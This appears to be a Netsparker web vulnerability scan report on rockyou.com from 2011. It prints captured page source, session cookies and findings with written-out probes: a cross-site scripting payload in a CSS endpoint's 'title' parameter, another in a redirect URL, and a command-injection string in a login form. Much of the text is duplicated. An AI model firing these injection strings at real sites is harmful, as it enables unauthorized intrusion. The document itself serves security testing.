document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?lang=en&refid='%22%3E%3Cnet%20sparker=netsparker(0x0025DA)%3E&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //O..
Date: Mon, 18 Apr 2011 22:44:12 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:44:11 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 22:44:12 GMT; path=/; domain=.rockyou.com,lastlogin=1303166652; expires=Wed, 27-Jul-2011 22:44:12 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:44:12 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:44:12 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:44:12 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=23658 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26899
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?lang=en&refid='%22%3E%3Cnet%20sparker=netsparker(0x0025DA)%3E&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //O..
|
- /developer/opensocial/opensocial-css.php
/developer/opensocial/opensocial-css.php |
Parameters
| Parameter | Type | Value |
| title | GET | '"--></style></script><script>alert(0x000650)</script> |
Notes
Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Request
GET /developer/opensocial/opensocial-css.php?title='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000650)%3C/script%3E HTTP/1.1
Referer: http://www.rockyou.com/developer/opensocial/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303163954; ctid=2; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Referer: http://www.rockyou.com/developer/opensocial/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303163954; ctid=2; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 21:59:14 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=4272 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 250
Connection: close
Content-Type: text/css
table {color:#414141}
th {text-align:left;font:bold 13px Arial, Helvetica, sans-serif}
.titlebar {background:url('"--></style></script><script>netsparker(0x000650)</script>) no-repeat;width:939px;height:91px;margin:15px auto 0px 18px}
.featurebox {background-color:#c0c0c0;width:594px;height:320px;padding:15px;font:bold 13px Arial, Helvetica, sans-serif}
Date: Mon, 18 Apr 2011 21:59:14 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=4272 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 250
Connection: close
Content-Type: text/css
table {color:#414141}
th {text-align:left;font:bold 13px Arial, Helvetica, sans-serif}
.titlebar {background:url('"--></style></script><script>netsparker(0x000650)</script>) no-repeat;width:939px;height:91px;margin:15px auto 0px 18px}
.featurebox {background-color:#c0c0c0;width:594px;height:320px;padding:15px;font:bold 13px Arial, Helvetica, sans-serif}
Internal Server Error
Internal Server Error
1
TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.
Impact
The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.
Remedy
Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| POST | "& ping -n 26 127.0.0.1 & | |
| useEmailPassword | POST | netsparker@example.com |
